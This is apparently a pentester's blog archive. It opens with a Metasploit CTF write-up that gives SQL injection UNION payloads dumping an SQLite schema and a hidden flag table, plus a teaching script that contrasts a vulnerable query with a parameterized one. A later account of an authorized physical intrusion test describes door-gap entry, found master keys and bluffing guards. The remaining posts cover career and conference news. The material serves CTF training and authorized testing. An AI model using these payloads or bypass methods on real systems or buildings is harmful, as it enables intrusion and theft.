Metasploit Community CTF 2020 – 2 of Spades

Setting up the attacking machine

Access a browser and use Burp or a proxy

I wanted to explain the set-up details because I really think it is useful for anyone who would like to play a CTF and access a browser when the connection to the attacking machine is made through SSH.

So this introduction aims to be useful for any CTF, or even for daily practice at your job.

You will have to use -D and -C when launching the command:

sudo ssh -C -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 4444

-D specifies the local port on which ssh opens a SOCKS proxy (dynamic port forwarding)

-C enables compression

-i specifies the location of the key file

Then we need to configure Burp to use this SOCKS proxy under the User options tab (it can also be done under Project options, depending on whether you want to keep it permanently or just for a specific project).

Then you can configure your browser proxy as you usually do when you use Burp Suite (note: this picture is of FoxyProxy, a Firefox add-on that I would recommend to anyone who often works on web pentests):


For this CTF my teammate CptButtStuff was using proxychains, which is an amazing tool to run a local program through the proxy.

Here is how to set it up:

Open a new tab and run ssh again as follows, using a different port from the one you used for Burp:

sudo ssh -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 5555

Edit the proxychains configuration file /etc/proxychains.conf and point it at the local SOCKS port (the format is type, host, port):

socks5 127.0.0.1 5555

And then you can launch the program you wish through proxychains (here I am using nmap):

proxychains nmap <IP-ADDRESS>

Cool! But how can I get a file from the remote host to my local machine?

You can use scp as follows:

scp -i private_key.pem username@remote:/path/to/file /local/dir

The Challenge

Now that we have a set-up ready (and not only for this chal 😀 ) we can work on 2 of Spades.

On port 9001 the service was HTTP (see below the extract from my nmap scan):

9001/tcp open  http        Thin httpd
|_http-server-header: thin

When we browse to this page we get a form:

One of the first things that comes to mind with a form is SQL injection, so I tried this and got a nice error disclosing plenty of information:

' Union select 1, 2 --

This basically means that we need to try adding another column.

And there we go:

Now that we know that the backend DB is SQLite, let's find payloads to dump the database:

Table name enumeration: SELECT name FROM sqlite_master WHERE type='table'
Table schema enumeration: SELECT sql FROM sqlite_master WHERE type='table'

Payload chosen

I used this one and got the schema of the tables:

' Union SELECT null, null, sql FROM sqlite_master WHERE type='table' --

The first line is exactly the one we need, so now we can query the information needed to get the flag:

' Union SELECT 1, flag, link from hidden --

And there we have the link to our card image; we just need to wget the PNG file and md5sum it to get the flag:

wget http://<IP>/eGHaMBu2XWvRA5cu/2_of_spades.png
md5sum 2_of_spades.png
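To show why the form behaved the way it did (a two-column UNION errors out, a three-column one dumps sqlite_master, and the hidden table then gives up the link), here is an added example that is not the challenge's code: a constructed three-column search query built by string concatenation, the three payloads from the writeup run against it, and the parameterized version that neutralizes them. The table cards and its columns are assumptions; only hidden, flag and link come from the writeup.

```python
import sqlite3

# Constructed sample schema standing in for the challenge database:
# a visible table the form searches plus the hidden table with the flag link.
SAMPLE_SCHEMA = """
CREATE TABLE cards (id INTEGER PRIMARY KEY, name TEXT, suit TEXT);
CREATE TABLE hidden (id INTEGER PRIMARY KEY, flag TEXT, link TEXT);
INSERT INTO cards VALUES (1, 'two', 'spades'), (2, 'ace', 'hearts');
INSERT INTO hidden VALUES (1, 'FLAG{constructed-sample}', '/eGHaMBu2XWvRA5cu/2_of_spades.png');
"""

PAYLOADS = (
    "' Union select 1, 2 --",                                                   # wrong column count
    "' Union SELECT null, null, sql FROM sqlite_master WHERE type='table' --",  # schema dump
    "' Union SELECT 1, flag, link from hidden --",                              # flag link
)


def open_sample_db():
    """Return an in-memory SQLite connection loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def search_vulnerable(conn, name):
    """Build the query by string concatenation: the defect the challenge form had.

    The SELECT has three columns, which is why a UNION with two columns makes
    SQLite raise an error while one with three columns succeeds.
    """
    query = f"SELECT id, name, suit FROM cards WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def try_payload(conn, payload):
    """Run one payload against the vulnerable search; return the rows or the error text."""
    try:
        return ("rows", search_vulnerable(conn, payload))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def search_safe(conn, name):
    """Hardened form: the value is bound as a parameter, so it can never alter the query shape."""
    return conn.execute(
        "SELECT id, name, suit FROM cards WHERE name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    db = open_sample_db()
    for payload in PAYLOADS:
        print(payload)
        print("  concatenated  ->", try_payload(db, payload))
        print("  parameterized ->", search_safe(db, payload))
```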


How to get started with pentesting?

When people ask me how to get into pentesting, the first thing I say is that practice is essential. But how do you practice pentesting on your own? How do you get started with virtual machines?

In this article I am going to explain how to create a virtual attacking machine. With this machine you will be able to practice on platforms that have « boxes », vulnerable machines that can be hacked. I will then present some of the websites you can use for practice.

Practicing this way is very helpful because it is the closest way to understand pentesting (it is not realistic, but you will learn the core techniques used in pentests).

How to get started?

Create your virtual attacking machine with Kali Linux

  1. Download VirtualBox and install it from here.
  2. Download the latest Kali Linux VirtualBox image (it is going to be our attacker machine). Make sure to take the VirtualBox image and not the VMware one.
  3. Install Kali:
  • Go to VirtualBox and click on « File » > « Import Appliance… »
  • Click on the yellow folder and navigate to the Kali image you downloaded, select it and click on Open
  • Click on Next and then click on Import. It will take a little while… Then launch it for the first time. The username should be kali and the password kali, but you can find this info on their website or in the description of your machine in VirtualBox

What website can you use?

Some great starters

First I would recommend creating an account on TryHackMe here, it's free! Then you will have to download your configuration file and connect to the VPN so you can start hacking away on their machines.

What is awesome about TryHackMe is that you even have a box to learn how to get started on their platform here. This other box will tell you everything about OpenVPN and how to access the boxes, so it will be useful not only on TryHackMe but also on other platforms and in your daily practice as a pentester (we sometimes need a VPN to reach a customer's systems for testing).

If you are not familiar with VPNs, here is a Wikipedia article explaining what they are. Simply put, you can see a VPN as a tool that gives you remote access to another computer or environment. TryHackMe and other pentesting practice websites require a VPN so that you can reach your practice environment, usually a vulnerable machine to hack.

If you are not familiar with Linux, TryHackMe has a box that explains it very well, and you even get a cool badge for completing it! You can also practice on this wargame website, where you will learn about Linux and security concepts. If you want a few more explanations of the concepts, you should definitely go to linuxjourney.

After this you can have a look at the box on TryHackMe that introduces you to pentesting: Basic Pentesting.

Here is a list of great boxes (all free) on TryHackMe for beginners:

There are plenty more; I really recommend you have a look around.

Push your skills further with other platforms

Have you covered the beginner skills? Do you want to go further? Here are some useful resources for that.

Code name 23-00


This story is largely based on real events; the names and places have been changed to ensure the anonymity of the characters and entities involved.

One beautiful fall morning, Agent John Durden and I received a mysterious package at the « Beautiful Winter Day » office…

No, our mission does not start with a tape recorder whose tapes burn out at the end of the message.

It starts with a mission order from the Bureau that Agent Effix left on our email inboxes:

« Good morning, Agent Durden and Agent Granville, your mission, if you agree, will be to enter the offices of Sansnom. We must act urgently, Sansnom would like to know if their security system is ready before the unfixable happens. You will have to visit four strategic locations:

The electrical room, the server room, the production room and finally the hardest place to reach, the management offices.

If you have no question, this message will self-destruct in a few seconds… or not. »

Excited about our new mission, Agent Durden and I took the first train.

When we arrived at the location, we thought we were in front of a fortress… This imposing building was surrounded by high, sharply pointed gates, its walls were adorned with surveillance cameras, and guards made sure that everyone who entered had a badge to prove their presence.

Also, to make things more difficult for us, any outside person who wanted to enter was escorted to his or her appointment.

This deployment of deterrent security forced us to make our scenarios more complex, but in no way diminished our determination.

In short, only one question occupied our thoughts: How to get in?

We then observed the habits of the local workers. How did they use their badges? Did they sneak into the glass gates in single or multiple groups?

That's when Agent Durden noticed that the glass door reserved for people with reduced mobility had a gap at the bottom large enough to fit through.

We also noted that by a certain time the main security towers were empty, only the scanning cameras were ensuring the security of the building.

Were they operational? We didn’t know.

These small discoveries, our many reconnaissance phases and our multiple scenarios led us to make an abrupt decision; our eyes concluded: « It will be tonight »…

23-00, dark night, like our camouflages, we were in front of the targeted door waiting for silence around us.

Excitement and apprehension took hold of us, but our determination would guide our entire mission.

Swept away by this mixture of emotions, I suddenly slipped under the narrow doorway.

Joined by my sidekick, we looked at each other for a moment without daring to breathe too deeply, as if we were waiting for something to happen. Nothing happened. In front of us were large staircases.

We went up the first steps and arrived at another staircase, but protected this time.

Undeterred, we went around and found an open door next to it.

So we began our ascent to the various offices in the building.

Our exploration on each floor allowed us to make beautiful discoveries such as blank badges to circulate in the building, precise plans of each room, unlocked mobile phones …

As our research progressed, we were able to find our way around this well-guarded lair which still seemed to selfishly hide some of its mysteries.

In one of the rooms on the third floor, we found temporary access badges, as well as a machine that seemed to be used to print new badges.

Our searches and finds were interrupted by our startle at every sound we thought we heard.

To optimize time, but more importantly to complete our mission, we eventually parted ways.

There, on one of the desks, I found a large booklet containing access codes and instructions for the building’s security systems.

Agent Durden had also made some interesting discoveries, including plans of the building.

Both of us, armed with our valuable information, decided to reach our first target, the management offices. Prior to our mission, I had been able to create a precise profile with information from the management.

When we arrived upstairs, we found that the door security system was much more elaborate than the others; listening only to his courage, Agent Durden began to try to pick the door.

Indeed, Agent Durden, always very skilled with his hands, had taken care to forge for us lock-picking equipment that would have made even the greatest locksmiths blush.

While he was testing his new tools, I concentrated on searching for any additional information from the surrounding offices.

Some of the drawers were locked, so the search for their keys intuitively led me to a box containing almost magically the keys to the drawers.

I made interesting discoveries about the schedules of the various members of the management. I made notes and took pictures of everything in case we had to improvise another scenario the next day if we didn’t reach our targets that night.

Agent Durden, who was dealing with a particularly tough door, suggested that I go back down to the third-floor offices to pick up a blank badge from the machine we had spotted beforehand, which he hoped would help him with this tedious task.

He didn’t count on a bunch of master keys that he found in a drawer. With these discoveries made, and the master keys tested on a few doors, we took the opportunity of opening the electrical room which we had located, but which we could not open for lack of keys.

Then we went back upstairs to the floor and the offices we had been looking for.

Suddenly, as we walked down a corridor, we heard the sound of a door slamming very near us, and Agent Durden rushed down a small perpendicular passage which ran along the side of the fully glazed offices and found a dark corner where he pressed himself against the wall.

Surprised by the urgency of the situation and dazzled by a shower of light on me, I had no choice but to stick to the wall of the passage.

Agent Durden glanced at me, his look distorted by anguish, and then a security guard passed us from behind who miraculously did not turn around and paid no attention to our cleverly concealed presence.

Once the silence came back, which seemed hours later but was only a few seconds, we moved away as quietly and quickly as possible. We resumed our mission at the refractory door to test the passes we had found earlier.

Eureka, it opened, we had reached our first target, which we took pictures of.

We decided to do all the floors we hadn't done yet in search of our last targets. That's how we found the server room; however, our master keys didn't work and the place was even more full of cameras than the rest of the offices.

We spotted a slab in a false floor and discovered that we could lift it to get into the room. We took a picture of it as evidence of a possible bypass of the security system and continued our descent and visit of the top floors.

We paused to study the plans we had found previously and especially the basement plan that intrigued us.

We spotted an area where nothing was indicated and concluded that it was probably another of our most important targets: the production room, which was also our last target, the one that would end our perilous mission.

So we headed there, joyful and carefree after our previous successes, but still discreet. As we descended to the basement we heard a radio noise and finished our descent on velvet steps despite my poor choice of shoes, which had an annoying tendency to squeak on the smooth floor. Once in front of the door of the ultimate room, I opened it carefully while Agent Durden took a picture of me saying « the backlight suits you! », which triggered my hilarity and prevented me from immediately seeing the person who was working in this room, which indeed seemed to be a production room.

« What's going on here? » asked the individual. Agent Durden stammered, « We're lost ».

Still mixed between the stress of our previous frights and exhilarated by the fact that this room was the end of our mission, I said to our interlocutor:

« My colleague was kind enough to accompany me to retrieve important documents. » I showed the official envelope that I had retrieved during our visit to the third floor, which contained just some letterhead paper that I had taken in case we had to build future scenarios.

« I had left them in the office, but now we can’t find the exit, where is it please? »

The individual, even more embarrassed than we were, pointed to the security post for the night exit, while a security guard came down and asked us what we were doing there in the middle of the night. We had been in the building for more than five hours. We explained our shameless lies to him again and showed him the temporary badges recovered earlier to justify our presence, while joining his colleague.

He asked us more questions and we were forced to give the name of our contact to justify the absence of an escort. The second officer was disconcertingly kind and explained that he was surprised to see us arrive in the basement.

They took our names and our identification papers, and then showed us the gate where we had to badge our way out. So we tried to get through with the temporary badges, which obviously did not allow us to open the glass doors.

So they opened the gates themselves and we were able to leave, relieved and happy about the success of this mission.

After walking a few meters outside, the second officer joined us to collect our temporary badges. « We will provide you with other badges tomorrow, » he apologized, « but we must first clear up this incident, which should not have happened. »

We gave him back our badges and were able to leave for the comfort of our homes, with the satisfaction of a mission accomplished and as many emotions as memories in our eyes and hearts.


Happy birthday C.S. by G.B.

I am proud to announce that my blog is 2 years old!

To celebrate this event, I made a visual recap of my challenge to become a pentester.

To realize my project of becoming a pentester, I relied on Philippe Carré's « Apprenance » concept.
« Apprenance » is « a lasting set of dispositions… favourable to the act of learning… in all situations: formal or informal, experiential or didactic, self-directed or not, intentional or accidental ».
Philippe Carré, 2005.

My project involved six steps: e-learning, CTFs, learning expeditions, an internship, conferences and volunteering. In order to document my approach, I created a blog to share my experience, and I also built an analysis grid of the skills resulting from the whole project.

I am so happy that I achieved my goal by being hired as a pentester at Okiok but my desire to learn remains as strong as ever.

Journey to be continued…

Six months later, in Canada…


I have already been in Canada for six months. Needless to say, I have not seen the time go by! Between two moves, daily life, my sports and community activities, and walks in the city and in nature, my passion for cybersecurity and its democratization has taken the biggest place.

This article presents what I have done in Montreal over these last six months. I will tell you how I continued my self-training and how my experience as a penetration testing specialist is going.

My work at Okiok

My work at Okiok is very varied and far exceeds my expectations (see the article about Okiok here). I have had various exciting mandates that have allowed me to discover the whole variety of missions possible in this profession. This job also allows me to improve at web, external and internal penetration testing. Recently, I even had the chance to do a physical penetration test (see my article on this adventure here). Beyond all the missions I have completed, I had the opportunity to host a lunchtime talk on penetration testing to present the profession to our colleagues. At the moment, I am working on a Blue Team mission where I am developing my defensive skills. As an Okiok employee, I can also attend conferences and take part in Capture the Flag competitions. Among other things, shortly after arriving on Canadian soil, I had the chance to take part in the famous Hackfest in Quebec City.

Other exciting commitments

Passionate about open-source intelligence (OSINT), I signed up for the Missing Persons CTF organized by Trace Labs. It is a great initiative that helps the authorities find missing persons. After attending some fascinating talks, I made myself a badge at the soldering village, I practiced lock picking and I hacked high-frequency radio badges!

On the front of democratizing cybersecurity and promoting cyberpeace, I have not been idle either! Indeed, on arriving in Canada I was warmly welcomed by Véro, Fyscillia and Sabrine, who organize round tables allowing women in cyber to debate various topics as part of NousSommesCyber (WoSEC Montréal). That is how I became a panelist at Ubisoft Montréal (see here) for a round table on cybersecurity awareness.

When I arrived, WoSEC Montréal was planning to organize workshops, and Véro suggested I help with this task. The first workshop was Diana Whitney's, who showed us how to exploit EternalBlue with the Blue box from Hack The Box. Then I ran an introductory workshop on web penetration testing.

With the current health situation (COVID-19), we decided to keep the workshops going remotely. Soon we will have the chance to get started with reverse engineering thanks to a presentation by Emma Spradbrow.

Also, during my activities for NousSommesCyber, I met Masarah, who invited me to join the NorthSec Diversity committee. The goal of this committee is to allow everyone, including people from marginalized groups, to attend NorthSec and benefit from the training offered at the event. Click here to learn more about NorthSec.

Interviews, talks and public speaking

To continue my awareness-raising efforts and share my knowledge, I answered several calls for proposals for various conferences and workshops. That is how I was selected to give a talk at WomenTechMakers Montréal.

Because of the global coronavirus pandemic, the event took place entirely online. You can watch my talk here:

Dans le cadre de MeetCyber, Enkelada Ibrahimi m’a contactée via Linkedin afin d’être interviewée pour raconter mon parcours, mon travail et mes projets. Mon entrevue est disponible ici sur Crowdcast.

Être interviewée ne m’a pas empêché de poursuivre mes projets en tant qu’interviewer! En effet, grâce à WoSEC j’ai fait la connaissance de Angela Marafino et Alyssa Miller que j’ai interviewées dans ma série de balados. Leurs parcours sont passionnants et inspirants! Je vous invite à les découvrir ici avec les précédents balados.

Pour améliorer mon aisance à l’oral et continuer à faire de nombreuses conférences, j’ai rejoint un club Toastmasters. C’est une expérience très enrichissante. Le club se réunit hebdomadairement et propose différents formats de participation. Par exemple, il y a un rôle d’évaluateur de la langue, qui consiste à faire un retour sur les termes et expressions utilisées par les divers intervenants. Nous faisons également des improvisations et bien sur des présentations orales.

Pour continuer à apprendre et affiner mes compétences, j’ai également continué mes formations en ligne. J’ai notamment complété le Mooc problem Solving qui m’a permis de développer une méthodologie face aux épreuves de la vie professionnelle. De plus, actuellement, je poursuis la formation de Elearn Security sur les tests d’intrusion web. Enfin, je continue à m’entrainer sur Hackthebox et Certifiedsecure et j’avance sur les exercices du Mossé Institute.

D’ailleurs, si vous êtes une femme intéressée par la cybersécurité le Mossé institute offre une formation gratuite et certifiante. Vous pouvez me contacter via Linkedin pour en savoir plus.

Retrouvez la suite de cette aventure dans un prochain article!

I have spent six months in Montreal already! Between two moves, daily life, sports, community activities and walks in the city and in nature, my passion for cybersecurity and its democratization has taken the largest place. This article aims to present what I have done over these past six months… How did I continue my self-study? How is my journey as a pentester going?

My work at Okiok is quite diverse and exceeds my expectations by far (see here my article about Okiok). So far, I've had various exciting mandates that allowed me to improve my skills in Web and external pentesting. Among other things, I have discovered internal and WiFi pentests and all the variety of possible missions in this position. Also, I had the opportunity to perform a physical pentest (see my article about it here).

Beyond these missions, I had the opportunity to host a lunch-and-learn about pentesting to introduce it to our collaborators.

At the moment, I am on a Blue Team mission where I’m developing my skills in cyberdefence.

With Okiok, I also have the opportunity to attend conferences and participate in CTFs.
For example, shortly after my arrival in Canada, I went to the famous Hackfest in Quebec City.
Passionate about Open Source Intelligence (OSINT), I signed up for the Missing Person CTF organized by Tracelabs, an initiative aiming at helping authorities find missing persons. After attending exciting conferences, I went to the soldering village to craft myself a badge, practiced lockpicking and hacked RFID badges!

As for democratizing cyber security and promoting cyberpeace, I have plenty of opportunities too!

Indeed, when I arrived in Canada, I was warmly welcomed by Véro, Fyscillia and Sabrine, who are all members of WeAreCyber (WoSEC Montreal). Every year, the team organizes panels allowing women from the cyber sector to debate different topics related to cybersecurity. It is within this context that I took part as a panelist at a round table organized by Ubisoft Montreal (see here) that focused on cybersecurity awareness.

Shortly after my arrival, WoSEC Montreal was planning to conduct workshops. Therefore, Véro invited me to join the team and help with this task. The first workshop was given by Diana Whitney. She showed us how to exploit Eternal blue with Hackthebox's « Blue » box. Then, I led an initiation workshop on web pentesting.

Due to the current pandemic outbreak, we decided to run all workshops online. Very soon, we are looking forward to having an introduction on reverse engineering given by Emma Spradbrow.

Also, in the context of my activities for WeAreCyber, I met Masarah, who invited me to take part in the Outreach committee of NorthSec.

The goal: to allow all audiences to attend NorthSec and benefit from the training offered at the conference.

To learn more about NorthSec, click here!

In order to continue my efforts to raise awareness and share my knowledge, I have answered several calls for papers. The efforts have been successful, as I was selected to give a talk at WomenTechMakers Montreal.

My talk for WomenTechMakers Montreal, in french

Due to COVID-19 the event took place remotely, so you can watch and listen to my talk by clicking on the link above.

As part of MeetCyber, Enkelada Ibrahimi contacted me via Linkedin and I was interviewed about my background, my work and my projects. The podcast is available here on Crowdcast.

Being interviewed didn’t stop me from continuing my interviews! Indeed, thanks to WoSEC I met Angela Marafino and Alyssa Miller who I interviewed in my podcast series.

Their backgrounds are exciting and very inspiring!

To improve my public speaking skills and continue to give many talks, I joined a Toastmasters club. It's a very enriching experience: the club meets once a week and offers different participation formats. For example, there is a language assessor role, which consists of reviewing the terms and expressions used by the various speakers. We also do improvisations and of course oral presentations.

Because I'm never done with learning new skills and improving myself

To continue to learn and refine my skills, I have continued my online training. In particular, I completed the Problem Solving MOOC, which allowed me to develop a methodology for dealing with the challenges of professional life. In the context of my employment at Okiok, I am currently doing the Elearn Security training about Web pentesting. Finally, I continuously train on Hackthebox and Certifiedsecure and I go further on the exercises of the Mossé Institute.

Moreover, if you are a woman interested in cyber security the Mossé Institute offers free training and certification. You can contact me via Linkedin to find out more.

Find the sequel of this adventure in another article soon!…

International Cyber Security Summer School 2019 (ICSSS 2019)

ICSSS 2019 in The Hague

At the end of August I took part in ICSSS 2019 in The Hague (Netherlands). We had different lectures about cybersecurity in various places such as Leiden University, the NCI Agency, Europol, The Hague Security Delta and the Dutch Innovation Factory. We also had the full week to work on different challenges in groups. My challenge was about cyber resilience for The Hague Center for Strategic Studies.

What is ICSSS 2019?

« The International Cyber Security Summer School (ICSSS) is an annual summer school, originally organised by NATO C&I Agency, Europol, the Netherlands Ministry of Defence Cyber Command, Leiden University and The Hague Security Delta. »

Source: ICSSS website

What happened?

Day 1

Day 1 of ICSSS 2019

Useful to know about Day 1:

The ice breaker game:

The afternoon was animated by Ákos Wetters. Ákos offered an app for an ice breaker game called SpotYet. We had to take a selfie and answer questions about ourselves. Then the app showed us the picture of the person we had to talk to and, after finding the person, we could talk about our answers or about anything else we fancied. It gave us the possibility to have one-on-one conversations instead of having to introduce ourselves in front of 60 other people. Here is a map of our interconnections during the event, made by SpotYet.

SpotYet interconnections map of our ice breaker game

A blue team vs red team workshop

Scenario of red team versus blue team game

The red team versus blue team game was made by Leila Taghizadeh. The red team is supposed to hack the blue team. The red team had to explain the process they would use to hack the company. The blue team had to explain how they would protect themselves.

ICSSS Tweet about Day 1

Day 2

Day 2 of ICSSS 2019

Useful to know about Day 2:

  • The morning lecture by Professor Bibi Van Den Berg was a broad overview of cyberspace. The following subjects were tackled: human error and cybersecurity incidents, law as an incentive to prevent human error, alternative ways of steering human behavior.
  • The afternoon workshop was given by Els de Busser. It was an exercise about NotPetya. We were divided into groups: some represented Russia and the others Ukraine. We had to build an argument to defend the side we were on, so that we could give our point of view in front of the international court of law.
ICSSS tweet about Day 2

Day 3

Day 3 at ICSSS 2019

Useful to know about Day 3:

The subjects tackled in the keynotes were as follows: introduction to the NCI Agency, cyber security at the NCI Agency, career opportunities at the NCI Agency.

NCI Agency’s tweet about Day 3

Day 4

Day 4 at ICSSS 2019

Useful to know about Day 4:

  • The keynotes were given by Maia Spilman and Michael Payne.
  • In the first workshop of the afternoon we saw how to transform a Raspberry Pi into a hacking tool. It was led by Niels Vonk and Ramon Janssen.
  • In the second workshop of the afternoon we worked on a home-made version of OWASP Juice Shop. It was led by Wout Debaenst and Ricardo Sanchez Marchand.
ICSSS tweet about Day 4

Day 5

Day 5 at ICSSS 2019

Useful to know about Day 5:

The subjects tackled in the morning lecture by Jarek Jakubcek were: introduction to Europol EC3 and the latest cybercrime trends and threats, use and abuse of cryptocurrencies, cryptocurrency investigations and strategic investigations, blockchain, OSINT and the Europol on-the-job experience.

Europol’s tweet about Day 5

Day 6

Day 6 at ICSSS 2019

Useful to know about day 6:

The subjects tackled in the morning keynotes were the following: a short briefing on the concept of the Dutch Innovation Factory, and cyber security activities within an international context. Also, Dr Rutger Leukfeld gave a lecture about the human factor in cybercrime and Peter Janssen presented Cybersprint.

Dutch Innovation Park’s tweet about Day 6

Summary of ICSSS 2019 in pictures

ICSSS 2019 summary in pictures

Why should you attend ICSSS ?

  • ICSSS gives a holistic view of cybersecurity. We had ethical hacking workshops and also tackled subjects as varied as laws, policies, cyber resilience, cryptocurrencies, …
  • You meet people from all over the world (22 different countries this year), with a great range of backgrounds from technical to legal.
  • The lectures were given by renowned university professors but also by experienced professionals from different fields (private and public sector).
  • Don't hesitate to apply: your motivation will lead the way! This is a once-in-a-lifetime experience.

To go further

Learning Expeditions in Israel

After having had the opportunity to go to Israel for a first learning expedition in 2015, I went back last July (2019). Israel is known as one of the best startup nations. I am going to share my experiences with you: one in the field of computer science and the other in cybersecurity.

SheCodes, Tel Aviv (2015)

SheCodes @ Campus Tel Aviv

The first time I went to Israel I attended one of the SheCodes meetups. They presented the different workshops, from the basics of web programming to more advanced programming. In these workshops everyone is welcome, whatever their level. You learn by doing and you can ask questions to other attendees or to the mentors.

If you have the opportunity to attend an event made by SheCodes, you definitely should, and if you live in Israel you should attend all of them. Since 2015 they have even grown: they are not only in Tel Aviv anymore but also in Jerusalem, Herzliya, Netanya, … Click here to get more info on their website.

Technion University (2015)

Technion, Dream it. Do it

During this learning expedition, I scheduled a visit to Technion University. If you want to do the same, you will have to contact them and provide a short bio and a brief explanation of why you want to visit. Then they will help you schedule a guided tour of the university.

Technion is among the world's top ten science and technology research universities. You can read the full history of this university here. Also, by going to Technion you will have the opportunity to visit the breathtaking city of Haifa. Why not take a snack break at Fattoush?

Fattoush restaurant

After this, I chilled out at Bahaï gardens!

View of Bahaï gardens

BSides Tel Aviv 2019

BSides TLV 2019

Workshop – Ethical Hacking 101 (July 2019)

For the first day of the Cyber Week of Tel Aviv I attended a workshop hosted by BSides Tel Aviv: Ethical Hacking 101 by Telspace Systems.

After a brief introduction to ethical hacking, we were able to practice a little. We used different scanners and tools. There were different environments set up just for us to hack. We got the opportunity to practice SQL injection, vulnerability scanning and vulnerability exploitation. We saw the full pentesting process, from looking for vulnerabilities to exploiting them, with tips and tricks to stay stealthy while doing so. They also presented a very useful tool, really worth mentioning here: CherryTree. With it you can take notes about your process, which makes the pentest report easier to produce in the end.

This class was an awesome introduction to ethical hacking. The instructors were very clear and passionate. If you have the opportunity to attend a BSides meetup you should totally do it.


The day after the workshops, BSides had organized different talks. They were presented by Keren Elazari, Security Analyst, Author and TED Speaker. There was also a special tent for BSides where you could see their partners. There was an area if you were looking for a job and one just to chill out. I need to add a special mention to the decorations of the stage and the posters. They were awesome! You can see the picture below.

Eva Galperin: Where do we go from here, fighting Spouseware and Stalkerware

Eva Galperin is Director of Cybersecurity at the Electronic Frontier Foundation.

The main points in her talks were the following:

  • Stalkerware and Spouseware are not detected by anti-virus
  • She convinced Kaspersky to help with the detection of those apps and take privacy seriously
  • The tools to fight against this exist
  • Laws that already exist need to be enforced
  • She is shouting out for people to talk about this.

If you scroll down you will find in the « To go further » section a link to a video of her talk.

Amichai Shulman and Yuval Ron: Alexa and Cortana in Windowsland

They presented different vulnerabilities they found in Cortana and Alexa on windows operated devices.

In the « To go further section » you will find the youtube Channel of Yuval Ron in which you can find some demos.

Sofia Belikovetsky: The Butterfly Effect Actively manipulating VW through hypervisor introspection

Sofia Belikovetsky took on the challenge of creating a virtual router in order to find anomalies in the network. In this talk she explained how she proceeded: how she was able to find out what was going on in the VMs from the outside (from a list of running processes to a monitor of every new process).

Tomer Zait and Nimrod Levy: ReDTunnel, Explore Internal Networks via DNS Rebinding Tunnel

Tomer Zait and Nimrod Levy presented ReDTunnel how it works and why they created it. In the « To go further » section you will find a link to ReDTunnel Github, why not contribute?

Yossi Sassi: PowerShell as a Hacking Tool

Yossi Sassi shared many tips to get the best out of PowerShell as a hacking tool. In the « To go further » section you can find a link to his slides and… a link to Yossi Sassi & The Oriental Rock Orchestra.

Omri Misgav: Bypassing user-mode hooks 101

Omri Misgav is the team leader of the security research team of Ensilo. In this talk he explained hooking and user-mode hooks.

Yaron King: Low hanging (blue) fruit, Hacking and defending yourself using open-source tools

Yaron King explained how he was confronted with password spraying and what he did about it.

Eyal Itkin: Karta Source code assisted Geographic-based binary matching

Eyal Itkin is a vulnerability researcher at Check Point Research. In this talk he explained how Karta works. In the « To go further » section you can find Karta Source code.

Danny Grander and Yuval Ofir from Pasten CTF Team: Capture the Flag

In their talk Danny Grander and Yuval Ofir explained what a CTF is and their experience with them. They also presented how they solve hard challenges.

Other events of the Cyberweek 2019 in Tel Aviv

Besides BSides (yeah I know xD), there were plenty of events during the Cyberweek. I went to some of them, which I will present here.

Women in Cybersecurity: How to attract more diverse talent

Leading Cyber Ladies invited inspiring women in. First, Keren Elazari interviewed some of them. They shared their experience and gave some advice:

  • Hila Meller, VP Security Europe, British Telecom. Her advice: if you want it, don't let anyone stop you. Believe in yourself.
  • Helen Dixon, Commissioner, Data Protection Commission, Ireland. Her advice: don't listen to any advice, you are perfect as you are.
  • Maria Thompson, Chief Risk Officer, State of North Carolina. Her advice: learn the foundations of IT; if you are able to achieve that, you will be more successful.

After those interviews, Eva Galperin, Director of Cybersecurity and Head of Threat Lab, Electronic Frontier Foundation, presented herself and her career in a brief talk.

Finally, there was a panel moderated by Reut Menashe, co-founder of BSides TLV.

Each person from the panel presented their background. Then they shared what and why in their opinion companies should do more to attract more talent.

  • For Limor Kessem, monoculture has a bad effect. She also said that the « bring a friend » policy has an impact on diversity. In fact, with this kind of policy companies tend to hire the same kind of people.
  • For Mary McGinley, companies need to have an extremely diverse team to see all aspects of a problem. She recalled the study that found that women won't apply for a job if they do not fit 100% of the criteria. She advises that even if many people tell you that you should not apply, apply anyway. She added: « do something you love and make it work for yourself ».
  • Karine Ben-Simhon said that it's important to encourage the private and public sectors to create equal opportunities. She also said that there is also a problem with women, because most HR staff are women.
  • For Moran Weber, the best way to make a difference is by combining top-down and bottom-up approaches. It's also important to revise job descriptions and understand why women don't apply. In her opinion those descriptions should avoid terms like « ninja code », « superstar », « rockstar », etc. She shared that her best decision was to start putting herself out there and to decide that her impostor syndrome would not decide for her. She used it to help her learn more.

Plenary talk CyberWar is the continuation of politics by other means: interview of Stevan Bernard by Keren Elazari

CyberWar is the continuation of politics by other means

In this interview Stevan Bernard explained how the attack on Sony Pictures of November 2014 was handled. Here are the main points he shared:

  • Never underestimate your enemy.
  • Decisions made on Day 1 are the decisions that saved the company. This day was all about global and big decisions. This is when they decided to call the FBI and cyber security companies.
  • The human link is the weakest link: the attack started with spear phishing.
  • With twelve thousand employees all over the world, in such an attack you need to find alternative ways to communicate: Sony used old BlackBerry phones.
  • You can't prepare enough: hire the right people, make the right decisions, get everyone on the same page and define roles and responsibilities.

FraudCON 3.0

Stage of FraudCon 3.0

This event was a full day event. All along the day awards for « Legends of fraud fighting » were given and the winners shared their experience. I am going to present some talks of the day.

Limor Kessem, executive security advisor at IBM, opened the day. She made an inventory of the last few years in terms of malware and presented some of it. After her introduction different talks were given.

Ori Wainshtein: Thinking beyond traditional fraud

Ori Wainshtein is Head of Risk Research and Intelligence at Intuit. After a presentation of Intuit, he explained that in his opinion we need to be able to educate our children about this. He presented different aspects of fraud prevention and some scams. To conclude he gave key advice: invest in customer safety, optimize for brand protection and develop a holistic view of fraud.

Panel: news from the kingdom

Panel news from the kingdom

In this panel participants shared the UK landscape in terms of fraud. Some figures were presented: reported fraud has increased by 6% since 2009. Identity fraud has been the biggest issue for a while and in 2018 it is more than ever; 85% of it is perpetrated online. They also tackled the issue of fraud detection and how to detect it.

Panel: tales from the colonies

Panel tales from the colonies

